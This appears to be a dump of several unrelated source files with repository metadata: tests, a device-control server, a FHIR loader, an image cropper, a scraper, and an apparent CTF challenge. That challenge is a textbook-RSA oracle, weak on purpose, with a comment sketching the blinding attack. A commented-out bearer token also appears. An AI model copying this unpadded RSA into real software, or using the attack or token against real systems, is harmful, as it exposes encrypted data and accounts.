'vote-2'
]
assert [election.id for election in form.election_models(session)] == [
'majorz-election-2',
]
| 30.675862 | 77 | 0.607239 |
af873620f2e0464a704d2cf26efb89cbe6bc0821
| 489 |
py
|
Python
|
ISTp/2014/korsakov_a_a/task_2_34.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
ISTp/2014/korsakov_a_a/task_2_34.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
ISTp/2014/korsakov_a_a/task_2_34.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task 2. Variant 34
# Write a program that prints your favourite quotation whose author
# is Plato. Remember that the author must be mentioned on a separate line.
# Korsakov A.A.
# 31.03.2016
print ('\nНикто не знает, что такое смерть и не есть ли она величайшее для человека добро. И однако, все ее страшатся как бы в сознании, что она - величайшее зло.')
print ('\n\t\t Платон')
input ('\n\n Нажмите Enter для выхода')
| 44.454545 | 164 | 0.748466 |
bb960271e706222acdc3d1eee56653d1674f3452
| 2,392 |
py
|
Python
|
test_data/split_and_load_bundles.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
test_data/split_and_load_bundles.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
test_data/split_and_load_bundles.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
##### DO NOT USE REFERENCES ARE NOT PRESERVED #####
##### times out on HAPI test server so split into thirds and save.
from fhirclient.r4models import (
bundle,
)
from json import loads, dumps
from requests import get, post, put
from datetime import datetime, date, timedelta
from pathlib import Path
from pprint import pprint, pformat
test_server = 'http://hapi.fhir.org/baseR4'
headers = {
'Accept':'application/fhir+json',
'Content-Type':'application/fhir+json',
#"Authorization": 'Bearer 0QLWt38GQHyYxrcHuG40mw==',# TEMP meditech token remove and fix if this works
}
base_path = '/Users/ehaas/Documents/FHIR/Davinci-Alerts/2020_09_hl7_connectathon/Synthea_Alert_Test_Data'
file_type = 'fhir'
file_size = '100Patients'
file = 'admit_notify-100r1.json'
mypath = Path() / base_path / file_type / file_size
myfile = mypath / file
print(f'Path to the Synthea FHIR bundle: {myfile}')
print()
ref_map = {
'Location': ('managingOrganization' , 'Organization'),
}
r_types = 'Patient','Practitioner','Organization','Location','Coverage','Encounter','Questionnaire','QuestionnaireResponse','Group'
for type in r_types:
my_b = bundle.Bundle(loads(myfile.read_text()))
print(f'Making the {type} Bundle')
pop_list = [i for i,e in enumerate(my_b.entry) if e.resource.resource_type != type]
[my_b.entry.pop(i) for i in reversed(pop_list)]
    if type in ref_map:
        element = ref_map[type][0]
        for entry in my_b.entry:
            ref_holder = getattr(entry.resource, element)
            old_ref = getattr(ref_holder, 'reference')
            # FHIR references are usually of the form 'ResourceType/id'
            new_ref = old_ref.replace('urn:uuid:', ref_map[type][1] + '/')
            setattr(ref_holder, 'reference', new_ref)
print(type, len(my_b.entry) )
if my_b.entry:
out_file = f'argo-pl100r1-{type.lower()}-transaction-bundle.json'
print(f'save {type} Bundle as argo-pl100r1-{type.lower()}-transaction-bundle.json' )
my_out_file = mypath / out_file
my_out_file.write_text(dumps(my_b.as_json()))
print('...saved!')
#load to ref server
for f in mypath.iterdir():
if f.name.startswith('argo-pl100r1'):
with post(test_server,headers = headers, data=f.read_text() ) as r:
print(f'posting {str(f)} to {test_server}...')
print(r.status_code)
if r.status_code > 200:
print(dumps(r.json() ,indent=4))
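# Shape of a minimal FHIR transaction bundle as the server expects it (a sketch;
# it is assumed the Synthea export already carries an entry.request per entry):
# {
#   "resourceType": "Bundle",
#   "type": "transaction",
#   "entry": [{
#     "fullUrl": "urn:uuid:<id>",
#     "resource": {"resourceType": "Patient", "...": "..."},
#     "request": {"method": "POST", "url": "Patient"}
#   }]
# }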
| 35.176471 | 131 | 0.663043 |
a524560897bffe8d9900040b114bdee8d4a3485b
| 1,957 |
py
|
Python
|
test_protocol/lfw/face_cropper/crop_calfw_by_arcface.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 1,329 |
2021-01-13T07:06:30.000Z
|
2022-03-31T07:23:39.000Z
|
test_protocol/lfw/face_cropper/crop_calfw_by_arcface.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 115 |
2021-01-13T10:42:57.000Z
|
2022-03-28T03:57:52.000Z
|
test_protocol/lfw/face_cropper/crop_calfw_by_arcface.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 351 |
2021-01-13T07:21:00.000Z
|
2022-03-29T14:11:39.000Z
|
"""
@author: Jun Wang
@date: 20201012
@contact: [email protected]
"""
import os
import sys
import math
import multiprocessing
import cv2
sys.path.append('/export/home/wangjun492/wj_armory/faceX-Zoo/face_sdk')
from core.image_cropper.arcface_face_recognition.FaceRecImageCropper import FaceRecImageCropper
def crop_calfw(calfw_root, calfw_lmk_root, target_folder):
face_cropper = FaceRecImageCropper()
file_list = os.listdir(calfw_root)
for cur_file in file_list:
if cur_file.endswith('.jpg'):
cur_file_path = os.path.join(calfw_root, cur_file)
cur_image = cv2.imread(cur_file_path)
face_lms = []
cur_file_name = os.path.splitext(cur_file)[0]
cur_lms_file_name = cur_file_name + '_5loc_attri.txt'
cur_lms_file_path = os.path.join(calfw_lmk_root, cur_lms_file_name)
cur_lms_buf = open(cur_lms_file_path)
line = cur_lms_buf.readline().strip()
while line:
line_strs = line.split(' ')
face_lms.extend(line_strs)
line = cur_lms_buf.readline().strip()
face_lms = [float(s) for s in face_lms]
face_lms = [int(num) for num in face_lms]
cur_cropped_image = face_cropper.crop_image_by_mat(cur_image, face_lms)
target_path = os.path.join(target_folder, cur_file)
cv2.imwrite(target_path, cur_cropped_image)
if __name__ == '__main__':
calfw_root = '/export/home/wangjun492/wj_armory/faceX-Zoo/face_recognition/face_evaluation/calfw/data/images&landmarks/images&landmarks/images'
calfw_lmk_root = '/export/home/wangjun492/wj_armory/faceX-Zoo/face_recognition/face_evaluation/calfw/data/images&landmarks/images&landmarks/CA_landmarks'
target_folder = '/export/home/wangjun492/wj_armory/faceX-Zoo/face_recognition/face_evaluation/calfw/calfw_crop'
crop_calfw(calfw_root, calfw_lmk_root, target_folder)
| 44.477273 | 157 | 0.706694 |
3c015adc1dabb48fb294a3beaa89a23254967f4b
| 92 |
py
|
Python
|
tests/views/test_app.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 1 |
2021-06-01T14:49:18.000Z
|
2021-06-01T14:49:18.000Z
|
tests/views/test_app.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 286 |
2020-12-04T14:13:00.000Z
|
2022-03-09T19:05:16.000Z
|
tests/views/test_app.py
|
DanielGrams/gsevpt
|
a92f71694388e227e65ed1b24446246ee688d00e
|
[
"MIT"
] | null | null | null |
def test_index(client):
response = client.get("/")
assert b"oveda" in response.data
| 23 | 36 | 0.673913 |
55812c7fedc170dbc1d0edb8894ed741fd977bd5
| 772 |
py
|
Python
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BinaryTreeLevelOrderTraversal_iter.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BinaryTreeLevelOrderTraversal_iter.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BinaryTreeLevelOrderTraversal_iter.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of binary tree.
@return: Level order in a list of lists of integers
"""
def levelOrder(self, root):
# write your code here
if root is None:
return []
res, q_lvl = [], [root]
while q_lvl != []:
pre, tmp = [], []
for node in q_lvl:
pre.append(node.val)
l, r = node.left, node.right
if l:
tmp.append(l)
if r:
tmp.append(r)
res.append(pre)
q_lvl = tmp
return res
| 22.705882 | 55 | 0.459845 |
fd227f9521e5c83f4b638aac1b6475e3dbca945c
| 12,306 |
py
|
Python
|
salamigalnet.py
|
MiaranaDIY/Salamigal
|
44ac98fa6463d46694e1f9343a0ebc788e7a88f8
|
[
"MIT"
] | 3 |
2017-08-02T12:26:34.000Z
|
2021-01-13T01:06:26.000Z
|
salamigalnet.py
|
MiaranaDIY/Salamigal
|
44ac98fa6463d46694e1f9343a0ebc788e7a88f8
|
[
"MIT"
] | null | null | null |
salamigalnet.py
|
MiaranaDIY/Salamigal
|
44ac98fa6463d46694e1f9343a0ebc788e7a88f8
|
[
"MIT"
] | 3 |
2017-02-14T22:10:00.000Z
|
2021-01-02T14:26:43.000Z
|
# -*- coding: utf-8 -*-
#Setup logging
import logging
import logging.config
logging.config.fileConfig('logging.conf')
# create logger
logger = logging.getLogger('root')
import multiprocessing
import threading
import time
import traceback
import subprocess as sp
import json
from devices.relay import Relay
from devices.ds18b20 import DS18B20
from devices.hcsr04 import HCSR04
from devices.l298n import L298N
#Manually create relay 1
relay_1 = Relay(17)
relay_1.name = 'Lampu Utama'
relay_1.location = 'Kamar Tamu'
relay_1.load_watt = 45
#Manually create relay 2
relay_2 = Relay(18)
relay_2.name = 'AC Samsung 1PK'
relay_2.location = 'Kamar'
relay_2.load_watt = 500
#Manually create ds18b20 1
ds18b20_1 = DS18B20('000005504c8b')
ds18b20_1.name = 'Sensor Suhu Kamar'
ds18b20_1.location = 'Kamar'
ds18b20_1.load_watt = 0.1
#Manually create hc-sr04 1
hcsr04_1 = HCSR04(23,24) #trigger, echo. don't inverse!
hcsr04_1.name = 'Sensor Tanki Air'
hcsr04_1.location = 'Tower Air'
hcsr04_1.load_watt = 0.001
hcsr04_1.tank_height = 150 #in CM
#Manually create L298N DC motor driver
l298n = L298N(25, 22, 27, 22, 27, 25)
l298n.name = 'L298N DC Motor Driver'
l298n.location = 'Casis'
l298n.load_watt = 1
class SalamigalNetworking(multiprocessing.Process):
def __init__(self, taskQ, resultQ):
super(SalamigalNetworking, self).__init__()
multiprocessing.Process.__init__(self)
self.resultQ = resultQ
self.taskQ = taskQ
self.stream_thread = []
self.streaming = 0
#Manually create device list to be send to client
def send_dev_list(self, mid, sid, uid="*"):
global relay_1
global relay_2
dev = [
{
'uid': {'label': 'UID', 'value': relay_1.uid},
'name': {'label': 'Device Name', 'value': relay_1.name},
'location': {'label': 'Location', 'value': relay_1.location},
'group': {'label': 'Group/Type', 'value':relay_1.group},
'watt': {'label': 'Load (Watt)', 'value': relay_1.load_watt},
'ontime': {'label': 'ON time (Hours)', 'value': round(relay_1.get_ontime(),2)},
'state': {'label': 'Load State', 'value': relay_1.state},
'stream': {'label': 'Streaming', 'value': relay_1.streaming},
'usage': {'label': 'Usage (Wh)', 'value': round(relay_1.get_usage(),2)}
},
{
'uid': {'label': 'UID', 'value': relay_2.uid},
'name': {'label': 'Device Name', 'value': relay_2.name},
'location': {'label': 'Location', 'value': relay_2.location},
'group': {'label': 'Group/Type', 'value':relay_2.group},
'watt': {'label': 'Load (Watt)', 'value': relay_2.load_watt},
'ontime': {'label': 'ON time (Hours)', 'value': round(relay_1.get_ontime(),2)},
'state': {'label': 'Load State', 'value': relay_2.state},
'stream': {'label': 'Streaming', 'value': relay_2.streaming},
'usage': {'label': 'Usage (Wh)', 'value': round(relay_2.get_usage(),2)}
},
{
'uid': {'label': 'UID', 'value': ds18b20_1.uid},
'name': {'label': 'Device Name', 'value': ds18b20_1.name},
'location': {'label': 'Location', 'value': ds18b20_1.location},
'group': {'label': 'Group/Type', 'value':ds18b20_1.group},
'stream': {'label': 'Streaming', 'value': ds18b20_1.streaming},
'temp': {'label': 'Temperature (C)', 'value': ds18b20_1.get_temp()}
},
{
'uid': {'label': 'UID', 'value': hcsr04_1.uid},
'name': {'label': 'Device Name', 'value': hcsr04_1.name},
'location': {'label': 'Location', 'value': hcsr04_1.location},
'group': {'label': 'Group/Type', 'value':hcsr04_1.group},
'stream': {'label': 'Streaming', 'value': hcsr04_1.streaming},
'range': {'label': 'Range (CM)', 'value': round(hcsr04_1.get_range(),2)},
'level': {'label': 'Level (%)', 'value': round(hcsr04_1.get_level(),2)}
},
{
'uid': {'label': 'UID', 'value': l298n.uid},
'name': {'label': 'Device Name', 'value': l298n.name},
'location': {'label': 'Location', 'value': l298n.location},
'group': {'label': 'Group/Type', 'value':l298n.group},
                'warming': {'label': 'Warming', 'value': l298n.warming},
'direction': {'label': 'Direction', 'value': l298n.direction},
'speed': {'label': 'PWM Speed', 'value': l298n.speed}
}
]
try:
if(uid == "*"):
dev = {
'dev': dev,
'global': {
'streaming': self.streaming
}
}
self.send_message(dev,mid,to=sid)
return dev
else:
for d in dev:
if(d['uid']['value'] == uid):
dev = {
'dev': [d],
'global': {
'streaming': self.streaming
}
}
self.send_message(dev,mid,to=sid)
return dev
return None
except Exception as err:
logging.error("%s", traceback.format_exc())
return None
#Manually create all device list and return the value or queried value
def get_dev_list(self, uid="*"):
global relay_1
global relay_2
try:
dev = [
{
'uid': relay_1.uid,
'obj': relay_1
},
{
'uid': relay_2.uid,
'obj': relay_2
},
{
'uid': ds18b20_1.uid,
'obj': ds18b20_1
},
{
'uid': hcsr04_1.uid,
'obj': hcsr04_1
},
{
'uid': l298n.uid,
'obj': l298n
}
]
if(uid == "*"):
return dev
else:
for d in dev:
if(d['uid'] == uid):
return d['obj']
return None
except Exception as err:
logging.error("%s", traceback.format_exc())
return None
#Function for changing device property
def set_dev(self, uid, param, val, sid, mid):
try:
if(uid != '*'):
dev = self.get_dev_list(uid)
#Special relay
if(dev.group == 'Relay'):
if(param == 'state'):
dev.turn(val)
#Update device change to client
self.send_dev_list(mid, sid, uid)
elif(param == 'stream'):
if(val == 1):
self.stream_start(uid, mid, sid)
else:
self.stream_stop(uid, mid, sid)
#Special DS18B20
elif(dev.group == 'DS18B20'):
if(param == 'stream'):
if(val == 1):
self.stream_start(uid, mid, sid)
else:
self.stream_stop(uid, mid, sid)
#Special HCSR04
elif(dev.group == 'HCSR04'):
if(param == 'stream'):
if(val == 1):
self.stream_start(uid, mid, sid)
else:
self.stream_stop(uid, mid, sid)
#Special L298N
elif(dev.group == 'L298N'):
if(param == 'direction'):
if(val == 'forward'):
dev.move_forward()
elif(val == 'backward'):
dev.move_backward()
elif(val == 'turn_left'):
dev.turn_left()
elif(val == 'turn_right'):
dev.turn_right()
elif(val == 'stop'):
dev.stop()
elif(param == 'speed'):
dev.set_speed(int(val))
elif(param == 'warm_up'):
dev.warm_up(self.send_dev_list, mid, sid, uid)
self.send_dev_list(mid, sid, uid)
#Stream All Dev
elif(uid == '*' and param == 'stream'):
self.stream_start('*', mid, sid)
except Exception as err:
logging.error(err)
#Function to initialize and start device stream threading
def stream_start(self, uid, mid, sid='*'):
if(uid == '*'):
if(self.streaming):
self.streaming = 0
return None
self.streaming = 1
else:
dev = self.get_dev_list(uid)
if(dev.streaming):
dev.streaming = 0
self.send_dev_list(mid, sid, uid)
return None
dev.streaming = 1
t_stream_dev = threading.Thread(name='Device Streamer', target=self.dev_streamer, args=[uid, mid, sid])
t_stream_dev.daemon = True
t_stream_dev.start()
def stream_stop(self, uid, mid, sid='*'):
if(uid == '*'):
self.streaming = 0
else:
dev = self.get_dev_list(uid)
dev.streaming = 0
#Function to stream all or specific device data & property
def dev_streamer(self, uid, mid, sid):
if(uid == '*'):
logging.info('Streaming All Devices to {} started'.format(mid))
while self.streaming == 1:
self.send_dev_list(mid, sid, '*')
time.sleep(0.1)
logging.info('Streaming All Devices to {} stopped'.format(mid))
else:
dev = self.get_dev_list(uid)
logging.info('Streaming device {} to {} started'.format(dev.name, mid))
while dev.streaming == 1:
dev = self.get_dev_list(uid)
self.send_dev_list(mid, sid, uid)
time.sleep(0.1)
self.send_dev_list(mid, sid, uid)
logging.info('Streaming device {} to {} stopped'.format(dev.name, mid))
#Send message to client
def send_message(self, data, mid, to='*', stat='complete', is_binary=False):
rpl = {
'is_binary': is_binary,
'data' : {
'$id': mid,
'$type': stat,
'data': data
},
            'to': to
        }
        self.resultQ.put(rpl)
        return rpl
def run(self):
logging.info("** {} process started".format(self.__class__.__name__))
while True:
try:
if not self.taskQ.empty():
queue = self.taskQ.get()
print(queue)
task = queue['task']
cmd = queue['cmd']
arg = queue['arg']
sid = queue['sid']
mid = queue['mid']
#Command parsing
if(cmd == "req_dev"):
self.send_dev_list(mid, sid, arg)
elif(cmd == "set_dev"):
self.set_dev(arg['uid'], arg['param'], arg['val'], sid, mid)
time.sleep(0.01)
except Exception as err:
logging.error("%s", traceback.format_exc())
return None
logging.info("** {} process stopped".format(self.__class__.__name__))
| 37.518293 | 111 | 0.4523 |
fd35e38db468183fbc2130ace713bdead94446e5
| 1,833 |
py
|
Python
|
Imaginary/2021/crypto/Textbook_RSA_2_Timmy_the_Lonely_Oracle/oracle.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
Imaginary/2021/crypto/Textbook_RSA_2_Timmy_the_Lonely_Oracle/oracle.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
Imaginary/2021/crypto/Textbook_RSA_2_Timmy_the_Lonely_Oracle/oracle.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env -S python3 -u
from Crypto.Util.number import *
from hidden import p, q, flag1
e = 65537
n = p*q
ns = str(n)
ctxt = pow(bytes_to_long(flag1), e, n)
class SneakyUserException(Exception):
pass
def print_ctxt(t):
print("Here's the encrypted message:", t)
print("e =", e)
print("n =", ns)
def encrypt():
global e, n, ctxt
ptxt = bytes_to_long(input("What's your message to encrypt? ").encode("utf8"))
print_ctxt(pow(ptxt, e, n))
def decrypt():
global e, p, q, n, ctxt
try:
c = int(input("What's your message to decrypt? "))
if c == ctxt:
raise SneakyUserException
d = pow(e, -1, (p-1)*(q-1))
m = pow(c, d, n)
pt = long_to_bytes(m)
if pt == flag1:
raise SneakyUserException
print("The decrypted message is",m)
print()
try:
print("That spells out \""+pt.decode("utf8")+"\" if that means anything to you.")
except UnicodeDecodeError as u:
print("I couldn't figure out what that says ... are you sure you're doing it correctly?")
    except SneakyUserException as err:
print("Hey, that's cheating! You can't ask me to decrypt the flag!")
print("I'm not playing with you any more! Go cheat somewhere else.")
exit()
def menu():
print()
print()
print("1: Get Encrypted Flag")
print("2: Encrypt Message")
print("3: Decrypt Message")
print("4: Quit")
print()
choice = int(input(">>> "))
if choice == 1:
print_ctxt(ctxt)
print()
print("Good luck!")
elif choice == 2:
encrypt()
elif choice == 3:
decrypt()
elif choice == 4:
print("Come back again soon!")
exit()
if __name__ == '__main__':
print("Hi! I'm Timmy! Have you come to play with my encryption system?")
print("Just let me know what I can do for you!")
while True:
try:
menu()
except Exception as ex:
print("Something's gone horribly wrong.")
print("I have to go now. Bye!")
exit()
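# The weakness this service demonstrates: textbook RSA is multiplicatively
# malleable, so the "no decrypting the flag" check can be blinded away.
# A sketch of the classic blinding attack (dec() stands for a hypothetical
# client-side wrapper around menu option 3 that returns the integer plaintext):
# c_blind = (ctxt * pow(2, e, n)) % n   # != ctxt, so the oracle accepts it
# m_blind = dec(c_blind)                # equals 2*m mod n
# flag = long_to_bytes(m_blind * pow(2, -1, n) % n)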
| 24.118421 | 92 | 0.6503 |
1f82e3b3b792e561d0d5636755e371f9303a81f2
| 939 |
py
|
Python
|
python/data_sutram/scraper/perform__.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/data_sutram/scraper/perform__.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/data_sutram/scraper/perform__.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import json
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
options = webdriver.ChromeOptions()
#options.binary_location = "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
chrome_driver_binary = "../chromedriver"
# performance logging must be enabled, otherwise get_log('performance') below fails
caps = DesiredCapabilities.CHROME.copy()
caps['goog:loggingPrefs'] = {'performance': 'ALL'}  # older chromedrivers use the key 'loggingPrefs'
driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options, desired_capabilities=caps)
driver.get('https://stackoverflow.com/questions/52633697/selenium-python-how-to-capture-network-traffics-response')
def process_browser_log_entry(entry):
response = json.loads(entry['message'])['message']
return response
browser_log = driver.get_log('performance')
events = [process_browser_log_entry(entry) for entry in browser_log]
events = [event for event in events if 'Network.response' in event['method']]
print(events)
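# To fetch an actual response body for one of these events (a sketch; requires
# Selenium 4's CDP bridge for Chromium drivers, and bodies are only retrievable
# while the browser still holds the resource):
# request_id = events[0]['params']['requestId']
# body = driver.execute_cdp_cmd('Network.getResponseBody', {'requestId': request_id})
# print(body['body'])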
| 40.826087 | 115 | 0.797657 |
2f09e20dc1f845d8e664b0c970c26c2fb78252be
| 24,912 |
py
|
Python
|
tests/api/test_event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 1 |
2021-06-01T14:49:18.000Z
|
2021-06-01T14:49:18.000Z
|
tests/api/test_event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 286 |
2020-12-04T14:13:00.000Z
|
2022-03-09T19:05:16.000Z
|
tests/api/test_event.py
|
DanielGrams/gsevpt
|
a92f71694388e227e65ed1b24446246ee688d00e
|
[
"MIT"
] | null | null | null |
import base64
import pytest
from project.models import PublicStatus
def test_read(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
with app.app_context():
from project.models import Event, EventStatus
from project.services.event import update_event
event = Event.query.get(event_id)
event.status = EventStatus.scheduled
update_event(event)
db.session.commit()
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_ok(url)
assert response.json["status"] == "scheduled"
def test_read_otherDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["public_status"] == "draft"
def test_read_otherUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False, admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_read_co_organizers(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id, organizer_a_id, organizer_b_id = seeder.create_event_with_co_organizers(
admin_unit_id
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["co_organizers"][0]["id"] == organizer_a_id
assert response.json["co_organizers"][1]["id"] == organizer_b_id
def test_list(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_list")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_search(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_search")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_dates(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
utils.get_ok(url)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
_, _, event_id = seeder.create_event_unverified()
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_dates_myDraft(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_dates_myUnverified(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def create_put(
place_id,
organizer_id,
name="Neuer Name",
start="2021-02-07T11:00:00.000Z",
legacy=False,
):
data = {
"name": name,
"start": start,
"place": {"id": place_id},
"organizer": {"id": organizer_id},
}
if legacy:
data["start"] = start
else:
data["date_definitions"] = [{"start": start}]
return data
@pytest.mark.parametrize(
"variant", ["normal", "legacy", "recurrence", "two_date_definitions"]
)
def test_put(client, seeder, utils, app, mocker, variant):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
utils.mock_now(mocker, 2020, 1, 1)
put = create_put(place_id, organizer_id, legacy=(variant == "legacy"))
put["rating"] = 10
put["description"] = "Neue Beschreibung"
put["external_link"] = "http://www.google.de"
put["ticket_link"] = "http://www.yahoo.de"
put["tags"] = "Freizeit, Klönen"
put["kid_friendly"] = True
put["accessible_for_free"] = True
put["age_from"] = 9
put["age_to"] = 99
put["target_group_origin"] = "tourist"
put["attendance_mode"] = "online"
put["status"] = "movedOnline"
put["previous_start_date"] = "2021-02-07T10:00:00+01:00"
put["registration_required"] = True
put["booked_up"] = True
put["expected_participants"] = 500
put["price_info"] = "Erwachsene 5€, Kinder 2€."
put["public_status"] = "draft"
if variant == "recurrence":
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=DAILY;COUNT=7"
if variant == "two_date_definitions":
put["date_definitions"].append({"start": "2021-02-07T12:00:00.000Z"})
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.dateutils import create_berlin_date
from project.models import (
Event,
EventAttendanceMode,
EventStatus,
EventTargetGroupOrigin,
)
event = Event.query.get(event_id)
assert event.name == "Neuer Name"
assert event.event_place_id == place_id
assert event.organizer_id == organizer_id
assert event.rating == put["rating"]
assert event.description == put["description"]
assert event.external_link == put["external_link"]
assert event.ticket_link == put["ticket_link"]
assert event.tags == put["tags"]
assert event.kid_friendly == put["kid_friendly"]
assert event.accessible_for_free == put["accessible_for_free"]
assert event.age_from == put["age_from"]
assert event.age_to == put["age_to"]
assert event.target_group_origin == EventTargetGroupOrigin.tourist
assert event.attendance_mode == EventAttendanceMode.online
assert event.status == EventStatus.movedOnline
assert event.previous_start_date == create_berlin_date(2021, 2, 7, 10, 0)
assert event.registration_required == put["registration_required"]
assert event.booked_up == put["booked_up"]
assert event.expected_participants == put["expected_participants"]
assert event.price_info == put["price_info"]
assert event.public_status == PublicStatus.draft
if variant == "two_date_definitions":
assert len(event.date_definitions) == 2
else:
assert len(event.date_definitions) == 1
len_dates = len(event.dates)
if variant == "recurrence":
assert (
event.date_definitions[0].recurrence_rule
== put["date_definitions"][0]["recurrence_rule"]
)
assert len_dates == 7
elif variant == "two_date_definitions":
assert len_dates == 2
else:
assert len_dates == 1
def test_put_invalidRecurrenceRule(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
